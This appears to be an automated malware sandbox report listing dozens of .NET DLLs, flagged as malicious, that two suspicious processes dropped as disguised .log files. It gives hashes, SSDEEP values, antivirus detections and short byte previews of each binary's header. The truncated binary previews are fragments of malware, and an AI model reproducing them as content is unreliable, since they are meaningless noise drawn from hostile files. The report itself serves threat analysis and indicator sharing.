                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\LYOHFeSO.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\NhTpGmEa.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\OwCQqHNY.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\QyoyMrRT.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Users\user\Desktop\RIIODaxx.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TLuxYJBs.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TighOBkV.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\TrDhynDR.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\UfHpjBzP.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\WEJfKGnq.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):28160
                                                          Entropy (8bit):5.570953308352568
                                                          Encrypted:false
                                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\YGwOgprl.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\YppwRUxj.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\aONOculH.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                          C:\Users\user\Desktop\bmSpwCMB.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24576
                                                          Entropy (8bit):5.535426842040921
                                                          Encrypted:false
                                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\brbenDCe.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\bzLxRmdk.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\cRzxxdpC.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\dtNNImGZ.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\eGrnpudr.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\eObFTdEx.log

                                                          Download File
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):28160
                                                          Entropy (8bit):5.570953308352568
                                                          Encrypted:false
                                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\ehSVuzCX.log

                                                          Download File
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.529329139831718
                                                          Encrypted:false
                                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
